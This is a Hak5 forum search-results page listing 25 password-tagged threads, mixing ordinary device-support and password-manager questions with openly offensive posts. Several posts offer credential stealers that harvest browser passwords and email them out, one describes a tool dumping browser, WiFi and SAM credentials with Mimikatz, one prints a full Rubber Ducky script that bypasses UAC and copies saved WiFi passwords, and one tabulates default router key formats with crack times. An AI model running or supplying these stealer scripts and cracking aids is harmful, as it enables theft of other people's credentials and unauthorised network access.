Hak5 Forums

Showing results for tags 'password'.



Found 25 results

  1. OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want to receive the goods :) 1.$url = 'https://1fichier.com/?xxxxxxxxx- Pass Stealer Software 2.$url = 'https://1fichier.com/?xxxxxxxxx - sendEmail Client *** You can change this with every similar software See u.. https://www.ducktoolkit.com/viewscript/59967fc4ac04af7d6d57dc54/ I appreciate all comments or rebuilds. Thanks
  2. Hey guys, I'm new to the USB Rubber Ducky and have some questions. I want to try and make some payloads for Chromebooks due to their wide use everywhere. Will that work? The password stealing payload was cool but it doesn't work due to the Chrome update. I have a workaround but it takes a little longer, involves going to the Chrome Web Store, installing the "show password" extension, showing the password, copying it, etc. Is that even possible to do with the USB Rubber Ducky? Where do I start? Thanks
  3. Wpa security

    Hi, does anyone know an attack for WPA TKIP like the famous WEP key recovery (my English is bad, so I will write the same in Spanish)? I mean, not a social engineering attack or brute force hash attack. Exploiting this vulnerability: http://mobile.wi-fiplanet.com/news/article.php/3784251/WPA-Vulnerability-Discovered.htm . Hello, first of all please excuse my English, it is not my native language. I wanted to know if anyone knows how to exploit the WPA key vulnerability described in the hyperlink, an attack similar to the WEP one for recovering the keys. Thanks in advance.
  4. Best Password Manager?

    For around a year I've been using Dashlane's Premium tier; however, my subscription has recently run out and before I spend another $40 I want to be sure there are no better alternatives. I was looking at LastPass as a replacement but with the upcoming acquisition by Citrix, I'm not too keen on what they might be planning for the service. I am keen on open source software and tend to use it whenever possible but in all honesty, I want to hear your experiences with the different software options available. For me, I consider syncing between devices quite important; however, I understand this usually comes with a cost and it's normally only available on proprietary software, so I am happy to sacrifice this for open and free alternatives. Cheers!
  5. [SOLVED] SSH into RNDIS_ETHERNET

    When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied'. I've changed the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  6. DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description: Dumps the usernames & plaintext passwords from Browsers (Chrome, IE, FireFox), Wifi, SAM Hashes, Mimimk@tz Dump, [new] Computer information (Hardware, Softwarelist, Hotfixes, ProductKey, Users...) without: Use of USB Storage (because USB Storage is mostly blocked by USBGuard or DriveLock); Internet connection (because Firewall ContentFilter blocks the download sites). Configuration: None needed. Requirements: Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED / Status: White: Give drivers some time for installation; Red Blink Fast: Impacket not found; Red Blink Slow: Target did not acquire IP address; Amber Blink Fast: Initialization; Amber: HID Stage; Purple Blink Fast: Wait for IP coming up; Purple Blink Slow: Wait for Handshake (SMBServer Coming up); Purple / Amber: Powershell scripts running; RED: Error in Powershell Scripts; Green: Finished. Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo: parallelize Creds gathering with PS; while Bashbunny is waiting for Target finished the script it can do some other nice work, i.e. nmap the target. (Not very useful at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment. put some version information into the sourcecode and the output file. rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox). Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain. Credits to...... 
https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  7. Hey, I ordered the beautiful USB rubber ducky and it's working flawlessly. On Windows it's easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish though, and seeing how that's possible on Windows, I don't see why it should be possible on Mac. I want to be able to find a password on a Mac computer, on Safari, Chrome or Firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed Dropbox and my computer automatically logs in to the Dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work I'll try my luck on the WiFi Pineapple NANO, just got it today. :D Thank you guys!
  8. Hi everyone, Lazagne project. First I tried to run this exe lazagne.exe on my desktop and I see in 2-3 seconds all my passwords from browsers and also hashes. So I chose to use this exe on my rubber ducky but nothing happened. I joined the script, you can download it. First I tried to run it without saving the results but in the beginning I will be happy to run it. Secondly, saving the results on the USB will be great. Thanks for the help in advance. LAZAGNE USB.txt
  9. Root password reset

    Is there a way to reset the root password without logging in?
  10. Hi, My friend got their facebook and twitter account hacked. Do any members know if it's possible to find out 1) who could have done it? (unlikely I know) 2) location of the hack? (if Q1 is unlikely, at least by narrowing the location of the compromise can help narrow down who did it). TIA : )
  11. Full external drive encryption

    Hi, just throwing out an idea about making a little video about encrypting external drives with key/usb, which preferably works cross-platform.
  12. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU. For WPA2 with the GTX 970, my benchmarks with hashcat are; 13,774,031,184 password hashes per day 573,917,966 per hour 9,565,299 per minute 159,421 per second Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list. For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info! SSID Length Password Format Combinations Time 2WIREXXX 10 0-9 10,000,000,000 17 hrs 3MobileWiFi 8 0-9 a-z 2,821,109,907,456 7 mth 3Wireless-Modem-XXXX 8 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) 65,536 1 sec Alice_XXXXXXXX 24 0-9 a-z 22,452,257,707,354,557,240,087,211,123,792,674,816 Never AOLBB-XXXXXX 8 0-9 A-Z 2,821,109,907,456 7 mth ATT### 10 0-9 10,000,000,000 17 hrs ATTxxxx 0000 10 0-9 A-Z 3,656,158,440,062,976 Never ATTxxxxxxx 12 a-z + symbols 1,449,225,352,009,601,191,936 Never belkin.xxx 8 2-9 a-f 1,475,789,056 2.5 hrs belkin.xxxx 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin.XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin_XXXXXX 8 0-9 A-F 4,294,967,296 7.5 hrs BigPondXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth BOLT!SUPER 4G-XXXX 8 4 numbers + Last 4 of SSID 65,536 1 sec BrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. 
BTHomeHub(1)-XXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth BTHomeHub2-XXXX 10 2-9 a-f 289,254,654,976 3 wks BTHub3 10 2-9 a-f 289,254,654,976 3 wks BTHub4 10 2-9 a-f 289,254,654,976 3 wks BTHub5 10 2-9 a-f 289,254,654,976 3 wks BTHub6 10, 12 0-9 a-z A-Z 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 Never CenturyLinkXXXX 14 0-9 a-f 72,057,594,037,927,936 Never Cisco 26 0-9 a-f 43,608,742,899,428,874,059,776 Never Digicom_XXXX 8 0-9 A-Z 2,821,109,907,456 7 mth DJAWEB_##### 10 0-9 10,000,000,000 17 hrs Domino-XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs E583x-xxxx 8 0-9 10,000,000 1 min E583x-xxxxx 8 0-9 A-F 4,294,967,296 7.5 hrs EasyBox 904 LTE 9 0-9 a-z A-Z 13,537,086,546,263,552 Never EasyBox-###### 9 0-9 A-F 68,719,476,736 5 days EEBrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. FRITZ!Box Fon WLAN #### 16 0-9 10,000,000,000,000,000 Never FrontierXXXX 10 0-9 10,000,000,000 17 hrs Hitron 12 0-9 A-Z (sometimes use the device’s serial number as the default key!) 4,738,381,338,321,616,896 Never INFINITUM#### 10 0-9 10,000,000,000 17 hrs iPhone 5 ? Lowercase word plus 4 numbers 172000^65,536 Need dict. Keenetic-XXXX 8 0-9 a-z A-Z 218,340,105,584,896 Never Linkem_XXXXXX 8 0-9 10,000,000 1 min Livebox-XXXX ? ? mifi2 13 0-9 A-Z 170,581,728,179,578,208,256 Never MobileWifi-xxxx 8 0-9 10,000,000 1 min MYWIFI (EE) - MYWIFI + 4 numbers 65,536 1 sec NETGEARXX - Adjective + Noun + 3 numbers Need dict. 
Netia-XXXXXX 13 0-9 a-f 4,503,599,627,370,496 Never ONOXXXX 10 0-9 10,000,000,000 17 hrs Orange-0a0aa0 8 0-9 a-f 4,294,967,296 7.5 hrs Orange-AA0A00 12 0-9 A-F 281,474,976,710,656 Never Orange-XXXX 8 2345679 ACEF 214,358,881 23 mins PLDT - PLDTWIFI + Last 5 digits of router MAC 1 1 sec Plusnet Broadband UK 64 a-z A-Z 0-9 - Never PlusnetWireless-XXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth PLUSNET-XXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Sitecom_XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs SKYXXXXX 8 A-Z http://www.ph-mb.com/products/sky-calc 208,827,064,576 2 wks SpeedTouchXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TALKTALK-XXXXXX 8 346789 A-Z (bar ILOSZ) 282,429,536,481 3 wks TDC-#### 9 0-9 a-f 68,719,476,736 5 days Tech_XXXXXXXX 8 A-Z 208,827,064,576 15 days Technicolor-Router 10 0-9 A-F 1,099,511,627,776 2.5 mth Telecom-XXXXXXXX ? ? TelstraXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TELUSXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Thomson 10 0-9 A-F 1,099,511,627,776 2.5 mth ThomsonXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TIM_PN51T_XXXX 8 0-9 WPS PIN is 12345670 10,000,000 1 min TNCAP-XXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TNCAPXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TP-LINK_###### 8 0-9 0-9 A-F 10,000,000 1 min TRENDnet TEW-123ABC 11 First 3 digits in SSID (123 here) + 8 digits https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries 2,821,109,907,456 7 mth TRKASHI-###### 8 2 numbers, 6 digits (10^2)^(26^6) Need dict. 
UNITE-XXXX 8 0-9 10,000,000 1 min UPCXXXXXXX 8 A-Z 208,827,064,576 15 days Verizon MIFIXXXX XXXX 11 0-9 100,000,000,000 7.5 days virginmediaXXXXXX 8 a-z (bar iol) 78,310,985,281 6 days VirginMobile MiFiXXXX XXX 11 0-9 100,000,000,000 7.5 days VMXXXXXXX 12 0-9 a-z A-Z 3,226,266,762,397,899,821,056 Never VMXXXXXXX-2G 8 a-z (bar iol) 78,310,985,281 6 days VMXXXXXXX-5G 8 a-z (bar iol) 78,310,985,281 6 days Vodaphone_XXXXXXXX 15 0-9 a-z 221,073,919,720,733,357,899,776 Never WLAN1-XXXXXX 11 0-9 A-F 17,592,186,044,416 Never ZyXELXXXXXX 13 10 0-9 A-Z 0-9 A-F 1,099,511,627,776 2.5 mth Please inform me of any inaccuracies or additional data you feel could be added. Enjoy! *edit* My sources are my own personal experiences, plus; http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/ https://scotthelme.co.uk/ee-brightbox-router-hacked/ https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959 https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  13. I have created a new USB Rubber Ducky script which can steal Chrome passwords in the blink of an eye. To see the code, go to my GitHub page. GitHub: https://github.com/Nuk3leus/Ducky-chrome-password-stealer Any contribution to improve this script would be great. Post on this forum or email me at Nuk3leus@gmail.com
  14. Hello, I'm trying to get THC-Hydra working on a website form which doesn't require a username but hydra wants me to specify it with either -l, -L or -C. The form field in question needs the following parameters, as far as I've found out using Burp Suite Free Edition: password=test&do_login=yes&Submit=Log+in I'm also not sure what service to use and what success or failure message the server sends (Burp Suite doesn't show it and the website doesn't display any message - it just refreshes and shows the same page). Currently I've tried http-form-post with the following parameters: hydra -t 5 -L users.txt -f -x 2:6:a www.<url>.com http-form-post "/protected:password=^PASS^:S=success" (Note that I've specified, with -L users.txt, a username file but this is not required by the website's form field) The website's form can be found under www.<url>.com/protected, how do I tell hydra to target the /protected page, and not only the www.<url>.com part? What can I do? Any ideas?
  15. Greetings! I really hope this isn't a silly question. I was talking with my friend about the NANO and how it can deauth clients on a network, then convince those clients to connect to the NANO as a rogue access point. I realize that it is not difficult to capture and rebroadcast SSIDs, but they are always open access points. If I wanted to capture the WPA or WPA2 handshake, is there a way to either log it and send it to another machine to be cracked, or just grab whatever information the device sends to the NANO, and use that to create a copy of the original SSID complete with its password? Basically, what I am trying to figure out is if the NANO can capture data that will assist in knowing the password to a particular network. I am still learning how handshakes, frames, and beacons work, and although I have a basic understanding, I am not sure if this is feasible or not. I know WPA and WPA2 passwords are hard to crack, but would it help if the device connecting to the rogue AP tried to give that rogue AP its part of that handshake? Would it be easier (or even feasible) to just go into that client system and take whatever the saved password is and store it for future use? Any clarity or resources on this subject would be appreciated. Cheers, Dez
  16. netgear GS752TP woe

    I have been hired into a new company. One task I have been challenged with is to discover the password for a Netgear GS752TP switch we have, but I cannot wipe the switch yet. This is because no one has documentation on this switch, and they don't have VLAN information on it (this switch will be removed from PROD once I can audit it). Is there a way to 'discover' the password, or otherwise reset it like you can with Cisco switches?
  17. Regarding password statistics and differences between demographics, have a little shufti at these. Good read. https://www.unix-ninja.com/p/Password_DNA https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvUGFzc3dvcmQgRE5BIEFwcGVuZGl4IG9mIENvbXBpbGVkIERhdGEucGRm And a free wordlist, compiled from the list used to create these statistics (looks half decent); https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvZG5hLmRpY3Q
  18. Forgot password Lanturtle

    I have forgotten my password to my Lanturtle (you don't have to say anything). What can I do to reset my password or the device?
  19. **This is my mod to the original by Siem. I changed it to save to the SD card while running twin duck software. I used code from different sources and compiled it as I am still learning. REM Title: WiFi password grabber save to twin duck SD REM Author: silent_noise REM Original by: Siem REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck REM requires Twin Duck firmware and SD card to be named "DUCKY" REM Adjust time for driver install DELAY 3000 REM Minimize all windows WINDOWS d REM Open cmd & bypass UAC DELAY 500 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 600 REM Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 100 REM Getting SSID STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A ENTER REM Creating A.txt STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER REM Get network type STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A ENTER REM Get authentication STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A ENTER REM Get password STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A ENTER REM Delete A.txt STRING del A.txt ENTER REM Create Log.txt STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER DELAY 100 REM Send Log.txt to sd card STRING copy Log.txt %duck%\%computername%-wifi-passwords.txt ENTER DELAY 500 REM Delete Log.txt and exit STRING del Log.txt & exit ENTER
  20. Windows Vista Password Recovery

    Hey, a friend of mine bought an older computer from his employer that is running Vista Home Premium, but his employer has forgotten the administrator password and has no password recovery disk. So my friend hired me to break into it. I'm having problems though. I've tried using OPHCrack on a live disk, but for some reason it can't find the password. Anyone have any ideas?
  21. [HELP] trml cmd to ask pw @ login

    I went into "user settings" and changed "asked at login" to "not asked on login". Now I can't sign in. It does not give me the option to enter a password, just says login, but plays the incorrect pw sound when I try. I can get into the guest account but that does me no good 'cause su and sudo don't work. I can ctrl alt f1 and login to the user there. I tried sudo visudo and changed the line to read NOPASSWD:ALL but that did not work. Anyone know how I can change back the user settings to ask for password at login from terminal?
  22. Ophcrack problem

    Hey there, So I was cleaning my PC by going back to the original state and when finished I created a new password. However I was a bit drunk and probably misspelled it. However after many tries I gave up and searched for other solutions. This led me to Ophcrack which I downloaded on a DVD and tried to run. But it gave an error about not finding the requested table(s). Now after a lot of tries with other programs and bootable USBs etc. it just won't work. Can anybody help me with this issue? I've got a Windows 7 64x OS. Starting script: ophcrack-launcher.sh Searching tables in: /media/sdc1/tables Tables found: /media/sdc/tables/vista_free/table0.bin List of Windows partitions containing hashes: 0. /media/sda2/WINDOWS/System32/config 1. /media/sda4/Windows/System32/config Select the partition to crack: 0 Starting Ophcrack 4 hashes have been found in the encrypted SAM found in /media/sda2/WINDOWS/System32/config/. Did not find the requested table(s) /media/sdc1/tables/vista_free/table0.bin. The passwords have been saved in /tmp/ophcrack.txt Press ENTER to continue... My console log Hope somebody can help me! If you need more information ask me! Regards, Rover PS. English is not my foreign language and I've typed the console log so there may be typing mistakes.
  23. Crunch Usage

    Hey guys, I was hoping anyone could help me out with creating a wordlist how I desire with crunch, e.g. usr1pass1, usr2pass2, usr3pass3......usr99pass99
  24. How Do I Sniff For Passwords

    Hi, how would I sniff https passwords using the NANO? I had a Mark 4 a while back and I didn't have much success. Also, how would I get the client to connect to the pineapple if they are already connected to a network? Thanks!
  25. LAN Turtle

    I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust, typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule